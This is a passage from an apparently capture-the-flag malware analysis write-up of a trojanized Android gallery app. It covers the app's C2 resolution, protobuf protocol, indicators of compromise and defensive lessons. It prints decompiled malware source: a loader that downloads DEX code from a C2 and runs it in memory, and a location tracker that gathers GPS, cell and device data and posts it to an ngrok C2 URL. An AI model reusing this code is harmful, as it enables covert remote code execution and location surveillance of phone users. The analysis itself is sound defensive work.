        conn.setRequestProperty("User-Agent", "Gallery/2.4.1");
15
        conn.setConnectTimeout(5000);
16
        conn.setReadTimeout(5000);
17

18
        if (conn.getResponseCode() != 200) return false;
19

20
        byte[] data = readStream(conn.getInputStream());
21
        conn.disconnect();
22

23
        // Parse protobuf response
24
        PayloadResponse response = PayloadResponse.parseFrom(data);
25
        byte[] dexBytes = response.getModuleData().toByteArray();
26
        String entryClass = response.getEntryClass();
27
        String entryMethod = response.getEntryMethod();
28

29
        return executeDex(dexBytes, entryClass, entryMethod);
30
    }
31

32
    // Execute DEX in memory using InMemoryDexClassLoader
33
    public boolean executeDex(byte[] dexBytes, String className, String methodName) {
34
        InMemoryDexClassLoader loader = new InMemoryDexClassLoader(
35
            ByteBuffer.wrap(dexBytes), context.getClassLoader());
36
        Class<?> cls = loader.loadClass(className);
37
        Object instance = cls.getDeclaredConstructor().newInstance();
38

39
        Method method;
40
        try {
41
            method = cls.getMethod(methodName, Context.class);
42
        } catch (NoSuchMethodException e) {
43
            method = cls.getMethod(methodName);
44
        }
45

46
        if (method.getParameterTypes().length == 1
47
            && method.getParameterTypes()[0] == Context.class) {
48
            method.invoke(instance, context);
49
        } else {
50
            method.invoke(instance);
51
        }
52
        return true;
53
    }
54
}

LocationTracker.java (Geolocation Exfiltration):

1
package com.system.location;
2

3
public class LocationTracker {
4
    private static final String C2_URL =
5
        "https://446d9f29543f.ngrok-free.app/api/geotag";
6
    private static final String TAG = "GeotagService";
7

8
    public void initialize(Context context) {
9
        try {
10
            sendLocationData(collectLocationData(context));
11
        } catch (Exception e) {
12
            Log.e(TAG, "Geotag service failed", e);
13
        }
14
    }
15

16
    private LocationData collectLocationData(Context context) throws InterruptedException {
17
        LocationData.Builder builder = LocationData.newBuilder();
18

19
        if (context.checkSelfPermission("android.permission.ACCESS_COARSE_LOCATION") != 0) {
20
            builder.setLocationStatus("permission_denied");
21
            return builder.build();
22
        }
23

24
        LocationManager lm = (LocationManager) context.getSystemService("location");
25

26
        // Try to trigger fresh GPS fix (posted to main looper)
27
        if (lm.isProviderEnabled("gps")) {
28
            new Handler(Looper.getMainLooper()).post(() -> {
29
                lm.requestSingleUpdate("gps", new LocationListener() {
30
                    public void onLocationChanged(Location loc) {
31
                        Log.d(TAG, "Cache refresh: " + loc.getLatitude()
32
                            + "," + loc.getLongitude());
33
                    }
34
                    // ... stub methods
35
                }, Looper.getMainLooper());
36
            });
37
            Thread.sleep(200L);  // Only 200ms wait
38
        }
39

40
        // Fallback chain: GPS -> Network -> Passive
41
        Location location = lm.getLastKnownLocation("gps");
42
        Location networkLoc = lm.getLastKnownLocation("network");
43

44
        // Compare GPS vs Network by timestamp/accuracy
45
        if (location != null && networkLoc != null) {
46
            // Use more recent or more accurate
47
        } else if (location != null) {
48
            // GPS only
49
        } else if (networkLoc != null) {
50
            location = networkLoc;
51
        }
52

53
        // Last resort: passive provider
54
        if (location == null) {
55
            location = lm.getLastKnownLocation("passive");
56
        }
57

58
        if (location != null) {
59
            builder.setLatitude(location.getLatitude());
60
            builder.setLongitude(location.getLongitude());
61
            builder.setAccuracy(location.getAccuracy());
62
            builder.setTimestamp(location.getTime());
63
            builder.setProvider(location.getProvider());
64
            builder.setLocationStatus("success");
65
        } else {
66
            builder.setLocationStatus("no_last_known_location");
67
        }
68

69
        // Telephony data (always collected)
70
        TelephonyManager tm = (TelephonyManager) context.getSystemService("phone");
71
        builder.setNetworkOperator(tm.getNetworkOperatorName());   // "T-Mobile"
72
        builder.setNetworkCountry(tm.getNetworkCountryIso());      // "us"
73
        builder.setSimCountry(tm.getSimCountryIso());              // "us"
74
        builder.setPhoneType(getPhoneType(tm.getPhoneType()));     // "GSM"
75

76
        // Cell tower info
77
        List<CellInfo> cells = tm.getAllCellInfo();
78
        if (cells != null && !cells.isEmpty()) {
79
            builder.setCellTowersVisible(cells.size());
80
            CellInfo cell = cells.get(0);
81
            if (cell instanceof CellInfoGsm) {
82
                builder.setCellType("GSM");
83
                builder.setCellId(((CellInfoGsm)cell).getCellIdentity().getCid());
84
                builder.setLac(((CellInfoGsm)cell).getCellIdentity().getLac());
85
            }
86
            // ... LTE, WCDMA variants
87
        }
88

89
        // WiFi data
90
        WifiManager wm = (WifiManager) context.getSystemService("wifi");
91
        if (wm.isWifiEnabled()) {
92
            WifiInfo info = wm.getConnectionInfo();
93
            builder.setWifiRssi(info.getRssi());
94
            builder.setWifiLinkSpeed(info.getLinkSpeed());
95
        }
96

97
        // Device metadata
98
        builder.setLocale(Locale.getDefault().toString());         // "en_US"
99
        builder.setCountry(Locale.getDefault().getCountry());      // "US"
100
        builder.setLanguage(Locale.getDefault().getLanguage());    // "en"
101
        builder.setSdkInt(Build.VERSION.SDK_INT);                  // 31
102

103
        return builder.build();
104
    }
105

106
    private void sendLocationData(LocationData data) throws IOException {
107
        HttpURLConnection conn = (HttpURLConnection) new URL(C2_URL).openConnection();
108
        conn.setRequestMethod("POST");
109
        conn.setRequestProperty("Content-Type", "application/x-protobuf");
110
        conn.setRequestProperty("User-Agent", "GeotagService/1.0");
111
        conn.setDoOutput(true);
112
        OutputStream os = conn.getOutputStream();
113
        data.writeTo(os);
114
        os.flush();
115
        os.close();
116
        conn.disconnect();
117
    }
118
}

HAR Traffic Analysis#

User-Agent Mapping#

User-Agent	Source	Purpose
`Gallery/2.4.1`	PayloadLoader	Payload download from C2
`MediaIndexer/1.0`	FileScanner.dex	File scan result upload
`MediaSync/1.0`	MetaDataParser.dex	Photo/video exfiltration
`GeotagService/1.0`	LocationTracker.dex	Location telemetry
`PrivacyBrowser/...`	Legitimate	User’s web browser

User-Agent Analysis Script (ua_analysis.py):

1
import json
2
from urllib.parse import urlparse
3

4
with open("user_traffic.har", "r", encoding="utf-8", errors="replace") as f:
5
    raw = f.read()
6
har = json.loads(raw)
7
entries = har['log']['entries']
8

9
# Extract all unique User-Agents
10
uas = set()
11
for e in entries:
12
    hdrs = {h['name'].lower(): h['value']
13
            for h in e.get('request',{}).get('headers',[])}
14
    ua = hdrs.get('user-agent','')
15
    if ua:
16
        uas.add(ua)
17
print(f"User Agents ({len(uas)}):")
18
for ua in sorted(uas):
19
    print(f"  {ua[:120]}")
20

21
# Extract all unique domains
22
domains = {}
23
for i,e in enumerate(entries):
24
    url = e.get('request',{}).get('url','')
25
    d = urlparse(url).hostname or ''
26
    if d not in domains:
27
        domains[d] = []
28
    domains[d].append(i)
29
print(f"\nDomains ({len(domains)}):")
30
for d in sorted(domains):
31
    print(f"  {d}: {len(domains[d])} entries")

Domain Summary#

Domain	Entries	Purpose
`446d9f29543f.ngrok-free.app`	30+	C2 server
`gist.githubusercontent.com`	15+	C2 address resolution
`*.googlevideo.com`	Several	YouTube video streaming
`www.youtube.com`	Several	YouTube web requests
`fonts.googleapis.com`	Few	Font loading
Various	Many	Normal browsing traffic

Complete HAR Extraction Script (`full_har_extract.py`)#

1
#!/usr/bin/env python3
2
"""Complete HAR extraction - find ALL suspicious traffic."""
3
import json
4
import base64
5
import os
6

7
HAR_FILE = "user_traffic.har"
8
OUT_DIR = "har_extracted"
9
os.makedirs(OUT_DIR, exist_ok=True)
10

11
with open(HAR_FILE, "r", encoding="utf-8", errors="replace") as f:
12
    raw = f.read()
13

14
# Handle truncated HAR files
15
try:
16
    har = json.loads(raw)
17
except json.JSONDecodeError:
18
    last = raw.rfind('"startedDateTime"')
19
    if last > 0:
20
        bracket = raw.rfind('{', 0, last)
21
        repaired = raw[:bracket].rstrip().rstrip(',') + ']}'
22
        try:
23
            har = json.loads(repaired)
24
        except:
25
            repaired = raw[:bracket].rstrip().rstrip(',') + ']}}'
26
            har = json.loads(repaired)
27

28
entries = har.get("log", {}).get("entries", [])
29
print(f"Total entries: {len(entries)}")
30

31
# Extract all POST/PUT request bodies
32
for i, entry in enumerate(entries):
33
    req = entry.get("request", {})
34
    method = req.get("method", "")
35
    if method in ("POST", "PUT", "PATCH"):
36
        url = req.get("url", "")
37
        pd = req.get("postData", {})
38
        text = pd.get("text", "")
39

40
        ua = ""
41
        for h in req.get("headers", []):
42
            if h.get("name", "").lower() == "user-agent":
43
                ua = h.get("value", "")
44
                break
45

46
        if text:
47
            fname = f"{OUT_DIR}/post_req_{i}.txt"
48
            with open(fname, "w", encoding="utf-8", errors="replace") as f:
49
                f.write(f"URL: {url}\nMethod: {method}\nUA: {ua}\n\n{text}")
50

51
# Extract binary request/response bodies for protobuf analysis
52
for i, entry in enumerate(entries):
53
    req = entry.get("request", {})
54
    url = req.get("url", "")
55
    if "ngrok" in url or "446d9f29543f" in url:
56
        # Save request body as binary
57
        pd = req.get("postData", {})
58
        text = pd.get("text", "")
59
        if text:
60
            with open(f"{OUT_DIR}/binary_req_{i}.bin", "wb") as f:
61
                f.write(text.encode("utf-8", errors="replace"))
62

63
        # Save response body
64
        resp = entry.get("response", {})
65
        content = resp.get("content", {})
66
        resp_text = content.get("text", "")
67
        encoding = content.get("encoding", "")
68
        if resp_text:
69
            if encoding == "base64":
70
                decoded = base64.b64decode(resp_text)
71
                with open(f"{OUT_DIR}/binary_resp_{i}.bin", "wb") as f:
72
                    f.write(decoded)
73
            else:
74
                with open(f"{OUT_DIR}/binary_resp_{i}.bin", "wb") as f:
75
                    f.write(resp_text.encode("utf-8", errors="replace"))

Protobuf Protocol Structures#

All communication with the C2 uses Protocol Buffers (protobuf). The structures were reverse-engineered from decompiled Java code and binary traffic analysis.

PayloadResponse (C2 -> Device)#

1
message PayloadResponse {
2
    bytes moduleData = 1;    // Raw DEX bytecode
3
    string entryClass = 2;   // Java class to instantiate
4
    string entryMethod = 3;  // Method to invoke (with Context param)
5
}

FileScanResult (Device -> C2)#

1
message FileScanResult {
2
    repeated FileEntry files = 1;
3
    message FileEntry {
4
        string name = 1;
5
        string path = 2;
6
        int64 size = 3;
7
        int64 modified = 4;
8
        string type = 5;
9
        string extension = 6;
10
    }
11
}

ImageUploadRequest (Device -> C2)#

1
message ImageUploadRequest {
2
    bytes fileData = 1;
3
    string fileName = 2;
4
    DeviceInfo device = 3;
5
    message DeviceInfo {
6
        string androidId = 1;
7
        string deviceModel = 2;
8
        string androidVersion = 3;
9
        string packageName = 4;
10
        int32 sdkInt = 5;
11
    }
12
}

LocationData (Device -> C2)#

1
message LocationData {
2
    double latitude = 1;
3
    double longitude = 2;
4
    float accuracy = 3;
5
    int64 timestamp = 4;
6
    string provider = 5;
7
    string locationStatus = 6;
8
    string networkOperator = 7;
9
    string networkCountry = 8;
10
    string simCountry = 9;
11
    string cellType = 10;
12
    int32 cellId = 11;
13
    int32 lac = 12;
14
    int32 cellTowersVisible = 13;
15
    string wifiSsid = 14;
16
    string wifiBssid = 15;
17
    string locale = 16;
18
    string country = 17;
19
    string language = 18;
20
    int32 sdkInt = 19;
21
    string deviceModel = 20;
22
    string androidVersion = 21;
23
    string timezone = 22;
24
    int32 timezoneOffset = 23;
25
    int32 wifiRssi = 24;
26
    int32 wifiLinkSpeed = 25;
27
}

Indicators of Compromise (IOCs)#

Network Indicators#

Domains:

1
446d9f29543f.ngrok-free.app
2
gist.githubusercontent.com/0wizlr/a2e4ba3849d1366678c2df925ee2cc4e

HTTP Patterns:

1
User-Agent: Gallery/2.4.1 (payload download)
2
User-Agent: MediaIndexer/1.0 (file scan upload)
3
User-Agent: MediaSync/1.0 (file exfiltration)
4
User-Agent: GeotagService/1.0 (location tracking)
5
Content-Type: application/x-protobuf (all C2 communication)

Endpoints:

1
GET  /cdn/assets           (payload delivery)
2
POST /telemetry/inventory  (reconnaissance)
3
POST /api/backup/chunk     (data theft)
4
POST /api/geotag           (location tracking)

File System Indicators#

APK Indicators:

1
Package: org.fossify.gallery (with injected PeriodicTaskManager)
2
Class: org.fossify.gallery.helpers.PeriodicTaskManager
3
Class: org.fossify.gallery.helpers.PayloadLoader
4
Config key: PERIODIC_TASK_INTERVAL (default 30000ms)

In-Memory DEX Payloads:

1
FileScanner.dex    - 6,088 bytes  - com.media.scanner.FileScanner
2
MetaDataParser.dex - 6,088 bytes  - com.media.geotagger.MetaDataParser
3
LocationTracker.dex - 10,146 bytes - com.system.location.LocationTracker

Android Permissions (from AndroidManifest.xml)#

1
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
2
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
3
<uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION"/>
4
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
5
<!-- Notable ABSENCE: android.permission.ACCESS_BACKGROUND_LOCATION -->

Device Profile#

Property	Value
Device Model	emulator64_arm64
Device Description	Android SDK built for arm64
Android Version	12
SDK Level	31
Target SDK	34
Carrier	T-Mobile
Network Country	us
SIM Country	us
Cell Type	GSM
Locale	en_US
Language	en
Android ID	6c26ad9ae1680e4c

Tools & Methodology#

Decompilation#

JADX: APK and DEX decompilation (jadx -d jadx_out gallery-17-gplay-release.apk)
JADX with bad code flag: For damaged DEX files (jadx --show-bad-code -d output LocationTracker_fixed.dex)

Traffic Analysis#

Python + json: HAR file parsing and entry extraction
Custom protobuf decoder: Manual varint/wire-type parser for binary protobuf data
UTF-8 fix function: HAR stores binary as UTF-8 text; reversal required for accurate protobuf decode

Scripts Used#

Script	Purpose
`decode_c2.py`	Decode C2 URL from Gist content (15x Base64 + XOR)
`extract_dex.py`	Extract DEX files from C2 response protobufs
`full_har_extract.py`	Complete HAR extraction of all POST bodies and binary data
`decode_geotag.py`	Initial protobuf decoding of geotag requests
`decode_geotag2.py`	Improved protobuf decoder with UTF-8 corruption fix
`decode_proto.py`	Generic protobuf field decoder
`check_exif.py`	Manual EXIF GPS extraction from photos (no Pillow dependency)
`ua_analysis.py`	User-Agent and domain analysis across all HAR entries
`check_c2.py`	Verify C2 domain appears in HAR traffic
`deep_analysis.py`	Deep analysis of all protobuf and binary entries

Key Techniques & Observations#

Evasion Techniques Used by the Malware#

Dynamic C2 Resolution: C2 address fetched from GitHub Gist at runtime, not hardcoded. Gist can be updated without modifying the APK.
Multi-Layer Encoding: 15 rounds of Base64 + XOR makes the Gist content appear as random data. The key “blastoise” is not obviously associated with any URL.
In-Memory DEX Execution: InMemoryDexClassLoader loads payloads without writing DEX files to disk, evading file-based scanning.
Protobuf Communication: Binary protobuf is harder to inspect than JSON/XML. All C2 traffic uses application/x-protobuf.
Legitimate User-Agents: Each module uses a plausible User-Agent (Gallery/2.4.1, MediaIndexer/1.0, MediaSync/1.0, GeotagService/1.0).
Trojanized Legitimate App: The base application (Fossify Gallery) is a real open-source gallery app. The malicious code is injected alongside legitimate functionality.
PASSIVE_PROVIDER GPS Strategy: Instead of requesting GPS directly (which would require background location permission), the malware piggybacks on other apps’ GPS requests.

Protobuf UTF-8 Corruption#

A significant challenge in analyzing the HAR file was that binary protobuf data was stored as UTF-8 encoded text. When raw bytes > 127 are stored in a JSON string, they get encoded as multi-byte UTF-8 sequences. To recover the original protobuf, the decoding function reverses this:

1
def fix_utf8(data):
2
    """HAR stores binary as UTF-8 text. Reverse the encoding."""
3
    text = data.decode('utf-8')
4
    return bytes([ord(c) for c in text])

This was critical for correctly decoding GPS coordinates (stored as IEEE 754 doubles) from the geotag requests.

Lessons Learned#

Attacker Techniques#

Supply Chain Trojanization: Legitimate open-source app modified with malicious scheduler and payload loader. Users trust “known” apps.
Server-Driven Payload: The C2 controls what modules run on the device. No modules are stored in the APK itself. This means:
- Different devices can receive different payloads
- Payloads can be updated server-side without APK changes
- Analysis of the APK alone reveals only the loader, not the actual malicious code
Scheduled Persistence: 30-second polling interval ensures payloads execute frequently. The malware survives app restarts through PeriodicTaskManager singleton pattern.
Opportunistic Location Collection: The PASSIVE_PROVIDER strategy is designed for stealth. The malware waits for other apps to activate GPS rather than doing it directly, avoiding suspicious permission requests and battery drain.
Multi-Stage Data Theft: First reconnaissance (FileScanner), then targeted exfiltration (MetaDataParser for files, LocationTracker for location). The C2 can prioritize based on scan results.

Defensive Takeaways#

Permission Audit: The absence of ACCESS_BACKGROUND_LOCATION is actually a clue. A gallery app requesting ACCESS_FINE_LOCATION is already suspicious.
Network Monitoring: All C2 traffic was to a single ngrok domain. DNS/SNI monitoring for ngrok subdomains in enterprise environments could flag this.
Binary Protocol Inspection: Protobuf traffic is opaque to basic HTTP inspection. Deep packet inspection or TLS interception is needed to detect the data exfiltration.
APK Integrity Verification: Comparing the installed APK against the official Fossify Gallery release would reveal the injected classes.
In-Memory Execution Detection: InMemoryDexClassLoader usage is a strong indicator of malicious behavior in production apps.

Track Conclusion#

The compromise was deliberate.
The Gallery app acted as a carrier, and outbound contact began only after return to a sealed environment.

The resulting cold-access channel behaved with restraint and precision: probing quietly, withdrawing cleanly, and waiting for certainty.

Those instincts were once defensive. Now they have been repurposed against the realm.

Beyond the logs: the Yeti continues using Ashka as a vessel to project disruption across the Cascade Expanse.

Writeup completed: March 12, 2026
Event: OffSec Arctic Howl - Tundra Realm
Challenge: Week 2 - Expanse Surveyor
Score: 7/7 questions correct

Investigation Report#

Week 2 - Expanse Surveyor#

OffSec Arctic Howl CTF - Tundra Realm#

About the Event#

Challenge Overview#

Challenge Questions & Solutions#

Question 1: C2 Address Discovery#

Question 2: C2 Address Decoding Steps#

Question 3: Reconnaissance#

Question 4: Endpoint Routing#

Question 5: Large Request Contents#

Question 6: Repeated Payload Data Collection#

Question 7: Geolocation Anomaly Explanation#

Complete Infection Timeline#

Phase 1: Initialization & C2 Resolution#

Phase 2: FileScanner Reconnaissance#

Phase 3: File Exfiltration#

Phase 4: Location Tracking (Repeated)#

Malware Architecture#

APK Details#

Module Summary#

LocationTracker.dex DEX Fix#

C2 Infrastructure#

Decompiled Source Code#

HAR Traffic Analysis#

User-Agent Mapping#

Domain Summary#

Complete HAR Extraction Script (full_har_extract.py)#

Protobuf Protocol Structures#

PayloadResponse (C2 -> Device)#

FileScanResult (Device -> C2)#

ImageUploadRequest (Device -> C2)#

LocationData (Device -> C2)#

Indicators of Compromise (IOCs)#

Network Indicators#

File System Indicators#

Android Permissions (from AndroidManifest.xml)#

Device Profile#

Tools & Methodology#

Decompilation#

Traffic Analysis#

Scripts Used#

Key Techniques & Observations#

Evasion Techniques Used by the Malware#

Protobuf UTF-8 Corruption#

Lessons Learned#

Attacker Techniques#

Defensive Takeaways#

Track Conclusion#

Complete HAR Extraction Script (`full_har_extract.py`)#